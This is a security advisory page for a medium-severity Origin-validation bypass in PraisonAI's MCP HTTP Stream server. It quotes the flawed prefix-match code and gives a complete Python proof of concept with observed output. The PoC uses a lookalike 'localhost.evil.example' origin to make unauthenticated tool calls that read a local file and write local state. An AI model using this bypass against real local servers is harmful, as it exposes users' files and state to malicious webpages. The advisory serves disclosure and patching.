PraisonAI has an origin validation bypass in MCP HTTP Stream transport that allows browser-mediated unauthenticated tool execution on local MCP serverGHSA-wj6g-v78p-6fx3
MEDIUMFix: MervinPraison/PraisonAI@2f9677aGHSA-wj6g-v78p-6fx3 is a medium-severity (CVSS 6.9) Missing Authentication vulnerability in praisonai. A fix is available for praisonai — see the affected versions and patch details below.
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
Exploitation and automatability from CISA’s SSVC triage for GHSA-wj6g-v78p-6fx3.
EPSS Exploitation Probability
Probability of exploitation in the next 30 days, from FIRST.org EPSS.
How urgent is this, really
GHSA-wj6g-v78p-6fx3 by exploitation likelihood (EPSS) against impact (CVSS). Outside the shaded patch-first corner.
Where this sits among everything scored
Of 385,386 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Counts from FIRST.org, log-scaled.
Real-World Exposure
praisonaiReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
PraisonAI's MCP HTTP Stream transport uses an unsafe prefix match when validating the Origin header. The default localhost allowlist includes origins such as http://localhost, and the validation accepts any origin that starts with an allowed value.
As a result, an attacker-controlled origin such as http://localhost.evil.example passes the localhost origin check.
When the MCP HTTP Stream server is started without an API key, which is the CLI default, this allows a malicious webpage to trigger unauthenticated MCP tools/call requests against a locally running PraisonAI MCP server.
This is best framed as a browser-mediated localhost attack / DNS-rebinding-style Origin validation bypass. The default server binds to 127.0.0.1, so this is not a directly internet-facing unauthenticated API in the default configuration.
Details
Relevant source locations:
src/praisonai/praisonai/mcp_server/cli.pysrc/praisonai/praisonai/mcp_server/transports/http_stream.pysrc/praisonai/praisonai/mcp_server/server.pysrc/praisonai/praisonai/mcp_server/adapters/__init__.pysrc/praisonai/praisonai/mcp_server/adapters/extended_capabilities.pysrc/praisonai/praisonai/mcp_server/adapters/cli_tools.pysrc/praisonai/praisonai/capabilities/files.py
The MCP CLI defaults to HTTP host 127.0.0.1, API key None, and allowed origins None unless explicitly configured:
parser.add_argument("--host", default="127.0.0.1")
parser.add_argument("--port", type=int, default=8080)
parser.add_argument("--api-key", default=None)
parser.add_argument("--allowed-origins", default=None, help="Comma-separated allowed origins for security")
The CLI registers all tools and passes the optional API key and allowed origins into the HTTP Stream transport:
register_all()
server.run_http_stream(
host=parsed.host,
port=parsed.port,
endpoint=parsed.endpoint,
api_key=parsed.api_key,
cors_origins=cors_origins,
allowed_origins=allowed_origins,
session_ttl=parsed.session_ttl,
allow_client_termination=allow_termination,
response_mode=parsed.response_mode,
resumability_enabled=parsed.resumability,
)
When allowed_origins is not explicitly configured and the server binds to localhost, the transport allowlist includes bare localhost origins:
if allowed_origins is None:
if host in ("127.0.0.1", "localhost", "::1"):
self.allowed_origins = [
"http://localhost",
"http://127.0.0.1",
"https://localhost",
"https://127.0.0.1",
]
The vulnerable validation accepts origins that merely start with an allowlisted value:
for allowed in self.allowed_origins:
if request_origin == allowed or request_origin.startswith(allowed):
return True
Because http://localhost.evil.example starts with http://localhost, it is accepted as a trusted localhost origin.
Authentication is only enforced if an API key is configured:
if self.api_key:
auth_header = request.headers.get("Authorization", "")
if not auth_header.startswith("Bearer ") or auth_header[7:] != self.api_key:
return JSONResponse(
{"error": "Unauthorized"},
status_code=401,
)
The request body is then parsed and dispatched to the MCP server:
body = await request.json()
response = await self.server.handle_message(body)
The MCP server handles tools/call by looking up the named tool and invoking the registered handler with attacker-controlled arguments:
tool_name = params.get("name")
arguments = params.get("arguments", {})
tool = self._tool_registry.get(tool_name)
if asyncio.iscoroutinefunction(tool.handler):
result = await tool.handler(**arguments)
else:
result = tool.handler(**arguments)
register_all() registers capability tools, extended capability tools, CLI tools, resources, and prompts:
def _register_all():
register_all_tools()
register_extended_capability_tools()
register_cli_tools()
register_mcp_resources()
register_mcp_prompts()
One exposed MCP tool is praisonai.files.create, which accepts a local file_path and passes it to file_create():
@register_tool("praisonai.files.create")
def files_create(file_path: str, purpose: str = "assistants") -> str:
from praisonai.capabilities import file_create
result = file_create(file=file_path, purpose=purpose)
file_create() opens attacker-selected string paths as local files and passes the file object to LiteLLM:
file_obj = file
if isinstance(file, str):
file_obj = open(file, 'rb')
response = litellm.create_file(**call_kwargs)
Another exposed MCP tool, praisonai.todo.add, writes attacker-supplied content into local PraisonAI state at ~/.praison/todo.json.
PoC
The following local PoC verifies the vulnerable Origin logic and unauthenticated MCP tool execution without contacting any external provider. It uses a fake in-memory litellm module so the file-read effect is captured locally and safely.
Run from the repository root with test dependencies installed:
python3 poc_mcp_origin_bypass.py
poc_mcp_origin_bypass.py:
import json
import os
import sys
import tempfile
import types
from pathlib import Path
from starlette.testclient import TestClient
ROOT = Path.cwd()
sys.path.insert(0, str(ROOT / "src" / "praisonai"))
sys.path.insert(0, str(ROOT / "src" / "praisonai-agents"))
# Fake litellm so the PoC proves local file read without network exfiltration.
captured = {}
fake_litellm = types.ModuleType("litellm")
def create_file(**kwargs):
f = kwargs["file"]
captured["filename"] = getattr(f, "name", "<bytes>")
captured["content"] = f.read().decode("utf-8")
class Resp:
id = "file-safe-local-poc"
object = "file"
bytes = len(captured["content"])
filename = captured["filename"]
purpose = kwargs.get("purpose")
status = "processed"
return Resp()
fake_litellm.create_file = create_file
sys.modules["litellm"] = fake_litellm
from praisonai.mcp_server.server import MCPServer
from praisonai.mcp_server.transports.http_stream import HTTPStreamTransport
from praisonai.mcp_server.adapters import register_all
register_all()
server = MCPServer(name="praisonai-local-poc")
# Default vulnerable configuration: localhost host, no API key, default allowed origins.
transport = HTTPStreamTransport(
server=server,
host="127.0.0.1",
api_key=None,
allowed_origins=None,
)
app = transport._create_app()
client = TestClient(app)
with tempfile.TemporaryDirectory() as td:
os.environ["HOME"] = td
marker = Path(td) / "safe-marker.txt"
marker.write_text("SAFE_LOCAL_MARKER_MCP_FILE_READ")
file_payload = {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "praisonai.files.create",
"arguments": {
"file_path": str(marker),
"purpose": "assistants",
},
},
}
# Non-localhost malicious origin is blocked.
blocked = client.post(
"/mcp",
data=json.dumps(file_payload),
headers={
"Origin": "https://evil.example",
"Content-Type": "text/plain",
},
)
# Prefix-matching bypass: accepted because it starts with http://localhost.
bypass = client.post(
"/mcp",
data=json.dumps(file_payload),
headers={
"Origin": "http://localhost.evil.example",
"Content-Type": "text/plain",
},
)
todo_payload = {
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "praisonai.todo.add",
"arguments": {
"content": "SAFE_LOCAL_TODO_MARKER",
"priority": "high",
},
},
}
todo = client.post(
"/mcp",
data=json.dumps(todo_payload),
headers={
"Origin": "http://localhost.evil.example",
"Content-Type": "text/plain",
},
)
todo_file = Path(td) / ".praison" / "todo.json"
print(json.dumps({
"blocked_origin_status": blocked.status_code,
"bypass_origin_status": bypass.status_code,
"bypass_response_text": bypass.json().get("result", {}).get("content", [{}])[0].get("text"),
"captured_file_basename": Path(captured.get("filename", "")).name,
"captured_file_content": captured.get("content"),
"todo_status": todo.status_code,
"todo_response_text": todo.json().get("result", {}).get("content", [{}])[0].get("text"),
"todo_file_exists": todo_file.exists(),
}, indent=2))
Observed output:
{
"blocked_origin_status": 403,
"bypass_origin_status": 200,
"bypass_response_text": "File created: file-safe-local-poc",
"captured_file_basename": "safe-marker.txt",
"captured_file_content": "SAFE_LOCAL_MARKER_MCP_FILE_READ",
"todo_status": 200,
"todo_response_text": "Todo added: 0440613d",
"todo_file_exists": true
}
The important results are:
Origin: https://evil.exampleis rejected with403.Origin: http://localhost.evil.exampleis accepted with200.- The bypassed request invokes
praisonai.files.createand reads the local safe marker file. - The bypassed request invokes
praisonai.todo.addand writes local PraisonAI state.
Impact
A malicious webpage can bypass the localhost Origin allowlist and trigger MCP tools/call requests against a locally running unauthenticated HTTP Stream server.
In local testing, this allowed invoking registered PraisonAI tools that:
- read an attacker-selected local file path and pass the file handle to the configured LiteLLM provider; and
- modify local PraisonAI state by writing to
~/.praison/todo.json.
The default MCP HTTP Stream bind address is localhost, so exploitation is browser-mediated. A practical attack requires the victim to run the HTTP Stream MCP server without an API key and visit an attacker-controlled origin that matches the prefix bypass, or a DNS-rebinding-style setup. If an API key is configured, exploitability is significantly reduced.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | praisonai | all versions | 4.6.58pip install --upgrade 'praisonai==4.6.58' |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for praisonai, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update praisonai to 4.6.58 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wj6g-v78p-6fx3 is resolved across your whole dependency graph.
Workarounds
Put an independent control in front of the weakness: restrict the affected endpoint or interface to trusted networks, require an additional authentication factor or proxy-level check, and invalidate existing sessions and credentials in case the flaw has already been used.
Frequently Asked Questions
Is GHSA-wj6g-v78p-6fx3 in your dependencies?
Find it across PyPI, including transitive dependencies.